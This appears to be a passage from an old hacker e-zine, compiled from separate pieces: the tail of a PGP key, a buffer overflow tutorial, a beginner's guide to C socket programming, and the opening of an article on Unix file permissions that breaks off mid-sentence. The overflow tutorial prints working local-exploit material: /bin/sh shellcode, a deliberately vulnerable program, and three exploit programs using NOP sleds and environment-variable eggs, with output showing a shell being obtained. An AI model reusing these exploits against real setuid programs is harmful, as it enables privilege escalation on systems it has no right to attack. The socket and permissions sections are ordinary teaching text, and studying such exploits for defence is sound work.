SdZ643ctQpeMpX/LelsR7CMEAJ05F/nwDej7orSdqae5OcAXCcW9TbqcLAbOzQZZ QvnZePPN6QvCgc/X5bnGuU42YaY883b4jps3fnyMVWe5qR0UHqDq5zxBy1xyEq3I ip4q2sLqwiReCTI+eBt7fAjaUlLTtdS/cEQMy5ERQhZWr+Q8ZxELzSjky7eVuciG ZNK7A/sFbZVVfpgT0edCyOPkhsIuxctcQENLZ8kRy2S1I68388dN5hVLGtPXn1b+ QfbwtQBX/sowyU0bkR9PQy6I1K8GvhX49Wo+q0ZXRIjt92oU4ioqnRpsc5buRMUc z5UjGTSxTIgIWiYFSdLOSTmNAAQvrj1sjWpm9tSuHA2YBBtErrQGdW5haDE2iQBL BBARAgALBQI3lI6KBAsDAQIACgkQ+xtU4W2kapHbWQCbBbg8mc5PCZE1Z5HPEoO/ la29WnMAoLryW301F92f526TkE6iQSFO/X1OuQENBDeUjqkQBADHnvWOGb1qX8dV YIGuZJGtAJLHvx1VNMM/C786eHLtl+MwHDl0OpJEIKM7cfT/lQmlmGuMTXvthlP/ qLaALC6G3StdVmRwqU+sXzpe97OPps5xsOS2bxESqgZYO7g6IwPQE31/xe0Qfzmz uikuamnJF6YtOlD1qrFoaGvIggpYZwACAgP+IiVjaYBvckuHDI73gd1kC+D+aS2C JQKQ1IxUxwJzOqw3ExVP0qDEJL1WpASB4FYe2QRHEDIHLn1Xn8RC0KnbZmbTE0sP IJqjCENY2i2T+l0NNc0UCsjlzcv6xLt+JpDUI/9NpFFEfioZuUIAMDkoIaoVCgkw r1zN67AlbaV0REKJAD8DBRg3lI6p+xtU4W2kapERAryEAJ97NQp4ANiB7uh3Ine3 MchIHoPSowCfWM6n0+bnd7njmGvOg+KdOQxtcQI= =xS9u -----END PGP PUBLIC KEY BLOCK----- <--> -----------------------[ BUFFEROVERFLOWS by Lamagra buffer/example.c void main() { char big_string[100]; char small_string[50]; memset(big_string,0x41,100); /* strcpy(char *to,char *from) */ strcpy(small_string,big_string); } <--> end of example.c The program creates two strings, memset() files the big_strings with char 0x41 (= A). Then it copies the big_string into the small_string. As we all see the small_string can't hold 100 chars and a bufferoverflow follows. Let's take a look at the memory: [ big_string ] [ small_string ] [SFP] [RET] During the bufferoverflow the SFP (Stack Frame Pointer) and the RET will be overwritten by A's. This means that the RET will now be 0x41414141 (0x41 is the hex value of A). When the function returns, the IP will be replaced by the overwritten RET. Then the computer will try to execute the instruction at 0x41414141. This will result in a segmentation violation because this address is outside the process space. --------------------[ Exploitation Now that we know we can change the flow of the program by overwriting the RET, we can try to exploit it. Instead of overwriting with A's, we could overwrite it with a specific address. ------------[ Execution of arbitrary code Now we need something to point the address to and execute. In most cases we'll just spawn a shell, although this is not the only thing we can do. Before: FFFFF BBBBBBBBBBBBBBBBBBBBB EEEE RRRR FFFFFFFFFF B = the buffer E = stack frame pointer R = return address F = other data After: FFFFF SSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF S = shellcode A = address pointing to the shellcode F = other data The code to spawn a shell in C looks like this: <++> buffer/shell.c void main(){ char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0); exit(0); } <--> end of shellcode I'm not going to explain how to produce shellcode because this will require a lot of knowledge in ASM. It's a long and boring process that we don't need to get into because there is more than enough shellcode available. For those who want to learn how to make it: - compile the program above using the -static flag - open it up in gdb, use the "disassemble main" command - take all the unnecessary code - change and rewrite it, this time in ASM - compile, open it up in gdb and use the "disassemble main" command - use the x/bx command on the addresses of the instructions and retrieve the hex-code. XXXXXXXXXXX X WAKE UP X XXXXXXXXXXX Or you can just take this code char shellcode[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; ------------[ Finding the address When we try to overflow a buffer of an another program, the problem is finding the address of the buffer. The answer to this problem is that for every program the stack starts at the same address. Therefore by knowing where the stack starts we can try to guess the address of the buffer. This program will give us its stack pointer: <++> buffer/getsp.c unsigned long get_sp(void){ __asm__("movl %esp, %eax); } void main(){ fprintf(stdout,"0x%x\n",get_sp()); } <--> end of getsp.c ------------[ Trying to exploit an example We're going to try to exploit this program: <++> buffer/hole.c void main(int argc,char **argv[]){ char buffer[512]; if (argc > 1) /* otherwise we crash our little program */ strcpy(buffer,argv[1]); } <--> end of hole.c <++> buffer/exploit1.c #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr += 4; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"BUF=",4); putenv(buff); system("/bin/bash"); } <--> end of exploit1.c Now we can try to guess the offset (bufferaddress = stackpointer + offset). [bubbles]$ exploit1 600 Using address: 0xbffff6c3 [bubbles]$ ./hole $BUF [bubbles]$ exploit1 600 100 Using address: 0xbffffce6 [bubbles]$ ./hole $BUF segmentation fault etc. etc. As you see this process is nearly impossible, we have to guess the exact address of the buffer. To increase our chances, we can pad NOP's before the shellcode in our overflow buffer. The NOP instruction is used to delay execution. We use it because then we don't need the guess the exact address of the buffer. If the overwritten return address points inside the NOPstring. Our code will be executed seconds later. The memory should look like this: FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF N = NOP S = shellcode A = address pointing to the shellcode F = other data We rewrite our old exploit. <++> buffer/exploit2.c #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"BUF=",4); putenv(buff); system("/bin/bash"); } <--> end of exploit2.c [bubbles]$ exploit2 600 Using address: 0xbffff6c3 [bubbles]$ ./hole $BUF segmentation fault [bubbles]$ exploit2 600 100 Using address: 0xbffffce6 [bubbles]$ ./hole $BUF #exit [bubbles]$ To improve our exploit even more, we could place the shellcode inside an environment variable. Then we could overflow the buffer with the address of this variable. This method will increase our chances even more. We modify our code so it uses the setenv() call to put the shellcode in the environment. <++> buffer/exploit3.c #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"BUF=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); system("/bin/bash"); } end of exploit3.c [bubbles]$ exploit2 600 Using address: 0xbffff5d7 [bubbles]$ ./hole $RET #exit [bubbles]$ --------------------[ Finding bufferoverflows There is really only one way to find bufferoverflows, and that is by reading the source. Since Linux is an open-source system, it will be easy to obtain the source of the programs. Long live open-source. Look for library functions that don't preform boundary checking like: strcpy(), strcat(), sprintf(), vsprintf(), scanf(). Other dangerous ones are: getc() and getchar() put in a while loop. misuse of strncat. --------------------[ Other refrences Smashing the stack for fun and profit by aleph1 bufferoverflows by mudge --------------------[ Ending Well that about wraps it up, i hope you learned something and enjoyed reading this guide. I enjoyed writing it. If you any further questions, remarks or anything, you can find me on IRC (irc.box5.net) in some channel. --------------------[ EOF =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= The *beginners* guide to sockets in C By: xphantom =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= So, you want to connect to other computers from within your own programs you say? You can't find any info on the net to teach you how to do so? You have no idea what man pages to look up? You can't find/afford any books? Well, you came to the right place. In this paper I hope to give a jump start into programming your own Internet applications in C. This paper does assume at least *some* familiarity with C and it's syntax, and also that you are using some form of UNIX or Linux (from now on referred to as *nix), although large parts of programming sockets in *nix is the same as in Windows, there are some differences which I won't get into (because I don't program in windows ;)). It should also be noted that all code contained in this paper was written and compiled on a Red Hat 5.2 system using glibc 2.0.7 and libc 5.3.12 and it all compiled fine. Now, lets get on with the show shall we. To a programmer, sockets are very similar to a low level file descriptor (you can even use the read() and write() functions with your sockets) although creating the socket itself is more involved than opening, reading and writing to files due to the additional complexity of creating network connection compared to reading and writing from your own hard drive. For most socket use, you will need a client, server pair. The server job is to listen on a specified port and perform some action when it receives a request from the client, while the clients job (obviously) is to "ask" the server to perform whatever task(s) it was programmed to do. We won't be using *every* socket type function in this paper since it is a beginner's tutorial, but there will be enough information to get you up and running and (hopefully) having some fun. With that said, let's make some sockets. =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Creating a socket with: socket() The first thing you need to do to write your socket program is (of course) create a socket, using the socket() function: ------- #include #include int socket(int af, int type, int protocol) ------ 'int af' is the address family or domain the socket is part of. The two most common are: AF_UNIX - Used for interprocess communication on a single machine. AF_INET - Used for interprocess communication on the same, or different systems using the DARPA protocols (UDP/TCP/IP). 'int type' is what type of connection you'll be using, the two most common are: SOCK_STREAM - Used for connection oriented sockets, guaranteed data delivery, or an error will be received by the sender. SOCK_DGRAM - Used for connection less sockets, data delivery not guaranteed. In this paper we will focus on family AF_INET and type SOCK_STREAM. 'int protocol' A protocol value of 0 is very common. This permits the system to choose the first protocol which is permitted with the pair of values specified for family and type. On success, a file descriptor is returned, on failure -1 is returned and errno is set accordingly. E.G: ------ #include #include int sockfd /* soon to be socket file descriptor */ sockfd = socket(AF_INET, SOCK_STREAM, 0) /* error checking here */ ------ And if all goes well, we now have a socket file descriptor that we can use across the Internet (AF_INET) using a connection based protocol (SOCK_STREAM) Remember, the protocol (0) is automatically set for us. =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Giving your socket a name using: bind() Ok, now we have our socket created. The next thing is we need to do something with it. Lets try giving it a name using bind(): ------ #include #include int bind(int sockfd, struct sockaddr *name, int namelen) ------ In a call to bind(), sockfd is the file descriptor for the socket, obtained from the call to socket(). Name is a pointer to a structure of type sockaddr. If the address family is AF_UNIX (as specified when the socket is created), the structure is defined as follows: ------ struct sockaddr { u_short sa_family; char sa_data[14]; }; ------ name.sa_family should be AF_UNIX. name.sa_data should contain up to 14 bytes of a file name which will be assigned to the socket. namelen gives the actual length of name, that is, the length of the initialized contents of the data structure. E.G: ------ #include #include struct sockaddr name; int sockfd; name.sa_family = AF_UNIX; strcpy(name.sa_data, "/tmp/whatever"); sockfd = socket(AF_UNIX, SOCK_STREAM, 0) /* error checking code here */ bind(s, &name, strlen(name.sa_data) + sizeof(name.sa_family) /* error checking code here */ ------ error checking note: on success bind() returns 0, on failure bind() returns -1 and sets errno accordingly. Now, in a call to bind using AF_INET we could use a different structure: ----- struct sockaddr_in { short int sin_family; /* Address family */ unsigned short int sin_port; /* Port number */ struct in_addr sin_addr; /* Internet address */ unsigned char sin_zero[8]; /* Same size as struct sockaddr */ }; ------ This is bit bigger and more involved but isn't to hard at all. Lets look at an example: ------ #include #include #include #include int sockfd, port = 23; struct sockaddr_in my_addr; if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Socket Error, %d\n", errno); exit(1); } my_addr.sin_family = AF_INET; /* host byte order */ my_addr.sin_port = htons(port); /* see man htons for more information */ my_addr.sin_addr.s_addr = htonl(INADDR_ANY); /* get our address */ bzero(&(my_addr.sin_zero), 8); /* zero out the rest of the space */ if((bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { printf("Bind Error, %d\n", errno); close(sockfd); exit(1); } ------ There you go, if all went well, our socket now has a name, and if all didn't go well, the error was reported and the program exited. A few small notes - if all your program does is connect to other computers, you don't need to use the bind() function at all (although it won't hurt anything). The line: my_addr.sin_port = htons(port); can be automated to get it's own port by just setting the port to 0, good for client programs, bad for server programs as you don't know what port it's using. Now we have a socket, it's named, but it still doesn't do anything, that's not good...lets see if we can connect to another computer. =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Remote connections using: connect() If you want to connect to a remote machine, there's no getting around using the connect() function: ------ #include #include int connect(int sockfd, struct sockaddr *serv_addr, int addrlen); ------ sockfd is our friendly socket file descriptor returned from out call to socket() serv_addr is a struct sockaddr containing the destination port and IP address addrlen can be set to sizeof(struck sockaddr) Lets have another example: ------ #include #include #include #define DEST_IP "132.241.5.10" #define DEST_PORT 23 main() { int sockfd; struct sockaddr_in dest_addr; /* will hold the destination addr */ sockfd = socket(AF_INET, SOCK_STREAM, 0); /* do some error checking! */ dest_addr.sin_family = AF_INET; /* host byte order */ dest_addr.sin_port = htons(DEST_PORT); /* short, network byte order */ dest_addr.sin_addr.s_addr = inet_addr(DEST_IP); bzero(&(dest_addr.sin_zero), 8); /* zero the rest of the struct */ connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)); /* error checking code here */ /* more code . . . */ } ------ Again, connect() returns 0 on success, -1 on error and sets errno You may have noticed the lack of a call to bind() because we don't care what port we connect from, in a case like this the only port that matter is the one we're connecting to. =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Listening for calls using: listen() Let's say we want to make a server program of some sort, we need some way to listen for incoming connections don't we, lets see if the listen() function works (it just might ya know ;)) ------ #include #include int listen(int sockfd, int backlog); ------ sockfd again is our socket file descriptor backlog is how many connection we'll take at once Again, as usual, listen() returns -1 and sets errno on error. Now in this case we will need to call bind() before we call listen() (we want a regular port for people to connect to instead of making them guess) Our function order so far would be: ------ socket(); /* to create out socket file descriptor */ bind(); /* to give our socket a name */ listen(); /* listen for connection */ ------ =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Taking the connection using: accept() Ok, this is where the...uhm...fun begins. Someone tries to connect to a port you happen to be listening on, you need to accept that connection now and accept() will do just that (who knew? ;)) ------ #include #include int accept(int sockfd, void *addr, int *addrlen); ------ Again, sockfd is out friendly socket file descriptor addr is usually going to a pointer to a struct, struct sockaddr_in addrlen will be set to: sizeof(struct sockaddr_in) Can you guess what gets returned on error?...you got it...-1 and errno gets set. E.G: ------ #include #include #include #define MYPORT 1500 /* the port users will be connecting to */ #define BACKLOG 5 /* how many pending connections queue will hold */ main() { int sockfd, new_fd; /* listen on sock_fd, new connection on new_fd */ struct sockaddr_in my_addr; /* my address information */ struct sockaddr_in their_addr; /* connector's address information */ int sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); /* do some error checking! */ my_addr.sin_family = AF_INET; /* host byte order */ my_addr.sin_port = htons(MYPORT); /* short, network byte order */ my_addr.sin_addr.s_addr = INADDR_ANY; /* auto-fill with my IP */ bzero(&(my_addr.sin_zero), 8); /* zero the rest of the struct */ /* did you remember your error checking? */ bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)); listen(sockfd, BACKLOG); sin_size = sizeof(struct sockaddr_in); new_fd = accept(sockfd, &their_addr, &sin_size); ------ Note that we will use the socket descriptor new_fd for all send() and recv() calls. If you're only getting one single connection, you can close() the original sockfd in order to prevent more incoming connections on the same port, if you so desire. =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= I think we need to talk: send() and recv() Now, we've created a socket, given it a name, listened for and accepted a connection, it's finally time to exchange information with send() and recv(): ------ #include #include int send(int sockfd, const void *msg, int len, int flags); int recv(int sockfd, void *buf, int len, unsigned int flags); ------ send(): sockfd - socket file descriptor msg - message to send len - size of message to send flags - read 'man send' for more info, set it to 0 for now :) recv(): sockfd - socket file descriptor buf - data to receive len - size of buf flags - same as flags in send() send() example: ------ char *msg = "Hey there people"; int len, send_msg; /* code to create(), bind(), listen() and accept() */ len = strlen(msg); bytes_sent = send(sockfd, msg, len, 0); ------ recv() example: ------ char *buf; int len, recv_msg; /* code to create(), bind(), listen() and accept() */ len = strlen(buf); recv_msg = recv(sockfd, buf, len, 0); ------ And again, both send() and recv() return -1 on error and set errno. If you're using type SOCK_DGRAM you use the sendto() and recvfrom() functions for sending and receiving data =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Nice talking to you: close() and shutdown() Once you're finished exchanging data, it's time to close the connection by simply closing the socket: ------ #include /* all you code */ close(sockfd); ------ Pretty easy eh? If you want a bit more control over how the connection gets closed you can use the shutdown() function: ------ int shutdown(int sockfd, int how) ------ There are three different values for how: 1 - no more revc()'s allowed 2 - no more sends are allowed 3 - no more send()'s or recv()'s allowed (same as close()) It's easy as that. You have now created a socket, given it a name, listened for connections, accepted connections, connected to other computers and closed the socket, not bad for a days work eh? =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Who are you: getpeerbyname() So you want to know who it is that's connecting to you? Well you're in luck! There just so happens to be a function for just that purpose: ------ #include int getpeername(int sockfd, struct sockaddr *addr, int *addrlen); ------ sockfd - our friendly socket file descriptor rears it's ugly head again addr - a pointer to either 'struct sockaddr' or 'struct sockaddr_in' addrlen - should be made to: sizeof(struct sockaddr) My oh my, getpeerbyname() also returns -1 on error, who would have guessed? If this call worked right, you now have the person's address and can use inet_ntoa() or gethostbyaddr() to print more info, not their login name though unless their running identd but that's beyond what we're talking about here. Read RFC 1413 for more information on that. =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Who am I: gethostname() Ok, getpeerbyname() was easy, well, gethostame() is easier. ------ #include int gethostname(char *hostname, size_t size); ------ hostname - an array of type char that will hold the host name on return size - size of the above mentioned array This returns the name of the computer your program is running on and can then be used with gethostbyname() to print out your IP address. Again, -1 on error and sets errno. =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= What's your IP? Well, lets put that information to use ok? We'll make our first, full fledged program, a DNS program. DNS or "Domain Name Service" is a way of getting a machines IP address by using it's "human-readable" address. Have you ever telneted to a machine and saw: $ telnet microsoft.com Trying 206.163.24.176 (not the real address but I'm too lazy to try :)) Well guess what, the first thing the telnet program did was do a DNS check on microsoft.com so it could find the IP. Now, to do this well be using the function gethostbyname() which can be found in netdb.h ------ #include struct hostent *gethostbyname(const char *name); ------ By looking at that you see it uses a structure called 'struct hostent' which looks like: ------ struct hostent { char *h_name; char **h_aliases; int h_addrtype; int h_length; char **h_addr_list; }; #define h_addr h_addr_list[0] ------ This structure breaks down to: h_name - Official name of host h_aliases - A NULL-terminated array of alternate names for the host. h_addrtype - The type of address being returned; usually AF_INET. h_length - The length of the address in bytes. h_addr_list - A zero-terminated array of network addresses for the host. Host addresses are in Network Byte Order. h_addr - The first address in h_addr_list gethostbyname() returns a pointer to the filled struct hostent, or NULL on error. (But errno is not set--h_errno is set instead. See 'man herror' for more help) Now lets make our DNS program ------ #include #include #include #include #include #include int main(int argc, char *argv[]) { struct hostent *h; if (argc != 2) { /* error checking on the command line */ fprintf(stderr,"Usage: getip \n"); exit(1); } if ((h=gethostbyname(argv[1])) == NULL) { /* get the host info */ herror("gethostbyname"); exit(1); } printf("Host name : %s\n", h->h_name); printf("IP Address : %s\n",inet_ntoa(*((struct in_addr *)h->h_addr))); return 0; } ------ And there you go, small and easy, just the way we like it, compile it with: gcc -o getip getip.c (assuming you saved it as getip.c :)) =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Client and Server programs Ok, lets end this discussion with a small, and somewhat pointless, client-server application. The only purpose of this is for a user to connect to the server, receive a predefined string, then disconnect, but it should get the point across, I'll leave making it more useful as a job for you to do...oh, you can do the error checking in it to :) ------ <++> socket/server.c /* SERVER PROGRAM */ #include #include #include #include #include #include #include #include #define PORT 1500 /* the port users will be connecting to */ #define BACKLOG 5 /* how many pending connections queue will hold */ main() { int sockfd, new_fd; /* listen on sock_fd, new connection on new_fd */ struct sockaddr_in my_addr; /* our address information */ struct sockaddr_in their_addr; /* their address information */ int sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); /* remember to error check (-1 on error) */ my_addr.sin_family = AF_INET; /* host byte order */ my_addr.sin_port = htons(PORT); /* short, network byte order */ my_addr.sin_addr.s_addr = INADDR_ANY; /* auto-fill with my IP */ bzero(&(my_addr.sin_zero), 8); /* zero the rest of the struct */ bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)); listen(sockfd, BACKLOG) while(1) { /* start out accept() loop */ sin_size = sizeof(struct sockaddr_in); new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size) printf("server: got connection from %s\n", inet_ntoa(their_addr.sin_addr)); fork(); /* this is the child process */ send(new_fd, "Hello, world!\n", 14, 0) close(new_fd); exit(0); while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child processes */ } } /* END SERVER PROGRAM, REMEMBER TO DO YOUR ERROR CHECKING */ <--> <++> socket/client.c /* CLIENT PROGRAM */ #include #include #include #include #include #include #include #include #define PORT 1500 /* the port client will be connecting to */ #define MAXDATASIZE 100 /* max number of bytes we can get at once */ int main(int argc, char *argv[]) { int sockfd, numbytes; char buf[MAXDATASIZE]; struct hostent *he; struct sockaddr_in their_addr; /* connector's address information */ if (argc != 2) { fprintf(stderr,"Usage: client \n"); exit(1); } he = gethostbyname(argv[1]); /* get the host info */ /* did you check for errors? */ sockfd = socket(AF_INET, SOCK_STREAM, 0); their_addr.sin_family = AF_INET; /* host byte order */ their_addr.sin_port = htons(PORT); /* short, network byte order */ their_addr.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(their_addr.sin_zero), 8); /* zero the rest of the struct */ connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)); numbytes = recv(sockfd, buf, MAXDATASIZE, 0); buf[numbytes] = '\0'; printf("Received: %s",buf); close(sockfd); return 0; } /* END CLIENT...YOU CHECKED FOR ERRORS RIGHT? :) */ <--> =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= Well, I think that's about it for now. This is by no means the complete guide to socket programming, actually, it's very far from being that and was never intended to be that so no problem. For further reading on this topic I would suggest checking out the following man pages: socket, bind, connect, perror, herror, listen, accept, send, recv, close, shutdown, getpeername, getsockname, gethostbyname, gethostbyaddr and getprotobyname. You may also find the following book to be good reading: ------ Internetworking with TCP/IP, volumes I-III by Douglas E. Comer and David L. Stevens. Published by Prentice Hall. Second edition ISBNs: 0-13-468505-9, 0-13-472242-6, 0-13-474222-2. There is a third edition of this set which covers IPv6 and IP over ATM. Using C on the UNIX System by David A. Curry. Published by O'Reilly & Associates, Inc. ISBN 0-937175-23-4. TCP/IP Network Administration by Craig Hunt. Published by O'Reilly & Associates, Inc. ISBN 0-937175-82-X. TCP/IP Illustrated, volumes 1-3 by W. Richard Stevens and Gary R. Wright. Published by Addison Wesley. ISBNs: 0-201-63346-9, 0-201-63354-X, 0-201-63495-3. UNIX Network Programming by W. Richard Stevens/ Published by Prentice Hall. ISBN 0-13-949876-1. ------- Wanna get the absolute lowdown on things? Check out these RFC's: ------ RFC-768 -- The User Datagram Protocol (UDP) (ftp://nic.ddn.mil/rfc/rfc768.txt) RFC-791 -- The Internet Protocol (IP) (ftp://nic.ddn.mil/rfc/rfc791.txt) RFC-793 -- The Transmission Control Protocol (TCP) (ftp://nic.ddn.mil/rfc/rfc793.txt) RFC-854 -- The Telnet Protocol (ftp://nic.ddn.mil/rfc/rfc854.txt) RFC-951 -- The Bootstrap Protocol (BOOTP) (ftp://nic.ddn.mil/rfc/rfc951.txt) RFC-1350 -- The Trivial File Transfer Protocol (TFTP) (ftp://nic.ddn.mil/rfc/rfc1350.txt) ------ Well, this is it I guess, time to bid you a farewell and a happy journey into sockets programming. As I said before, this is *NOT* a complete manual, it is merely a small primer. There maybe huge errors in here that I've totally missed, oh well, such is life, I never claimed to be an expert ;) Maybe soon I'll get around to doing a paper on type SOCK_DGRAM and other such socket oddities. 'Till then, have fun. ~xphantom =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+= -------[ File permissions by Lamagra http://bounce.to/unah16 -----------[ Introduction Although permissions determine who can read, write or execute a file, they also determine the file type, and how the file is executed. You can display the permissions of a file with the command 'ls -l'. An example listing might look like this: Drwx------ 2 tom users 512 Jan 3 13:44 Mail Drwx------ 5 tom users 1024 Jan 17 08:22 nsmail drwx------ 2 root root 512 Dec 28 22:44 bin -rw-r--r-- 1 tom users 23801 Jan 4 15:05 picture.gif -rw------- 1 tom users 787 Jan 12 06:35 prog.c -rwx--x--x 1 tom users 44692 Jan 12 06:41 prog 1 2 3 4 5 6 7 The first column shows us the file permissions, the second column tells us the number of links to the file, and the third column shows who owns the file. The fourth column shows to what group the file belongs, the fifth column tells the number of bytes used by the file. The sixth column holds the date and time of creation, and the seventh shows the name. -----------[ Permissions The file permission field is divided into four sub-fields: - rwx rwx rwx The first sub-field defines the file type. The different types are: - normal file b block device c character device d directory l symbolic link The next tree sub-field define the actual file permissions. The first three characters are the user permissions, the next three the group permissions and the last three are the permissions for everyone else. The characters have the following meanings: r read permission w write permission x permission to execute s user ID bit t sticky bit The sticky bit tells the system to save a copy of a running program in memory after the program completes. This way the system can save a little amount of time, the next time the program is executed. Because it doesn't have to be reloaded into the memory. Permissions can be changed with the 'chmod' command in a absolute or relative manner. The absolute manner uses octal permissions, the following table shows a list of valid octal permissions. 0001 executes permission for the everyone 0002 write permission for the everyone 0004 read permission for the everyone 0010 execute permission for the group 0020 write permission for the group 0040 read permission for the group 0100 execute permission for owner 0200 write permission for owner 0400 read permission for owner 1000 sticky bit 2000 group ID bit if the file is executable, otherwise mandatory file locking 4000 user ID bit if the file is executable You give a file read, write permission for the owner and read permission for group and everyone else in the following manner: 0200 write permission for owner 0400 read permission for owner 0040 read permission for group 0004 read permission for everyone ______________________________________ 0644 read and write for owner + read for everyone. chmod 644 file Relative permissions are slightly different. You have to state the following: * whom you're giving permissions to * what operation you intend to preform * what the permissions are whom: a all users g group o others u user operator: + add - remove = set permissions: the characters above example: read and write for owner + read for everyone chmod u=rw,g=r,o=r file -----------[ SUID and SGID SUID is short for Set User ID, and SGID is short for Set Group ID. When you run an executable file with these permissions, it's effective UID (User ID) is set the same as the user that owns the file. SGID is similar except it changes the GID (Group ID) instead. Although this feature is very useful, it can present a huge security hole. SUID programs are generally used when the program needs special permissions, such as root permission, to run. -----------[ file permissions in C Every single bit of information about a file is found inside a structure called an i-node. To get that information you can use the three following system calls: int stat(const char *path, struct stat *statb); int lstat(const char *path, struct stat *statb); int fstat(int fd, struct stat *statb); "stat" is the most commonly used syscall of the three. It gets the information on a file using the path and places it into the structure statb. The only difference between lstat and stat is that when the file is a symbolic link stat would return information about the file 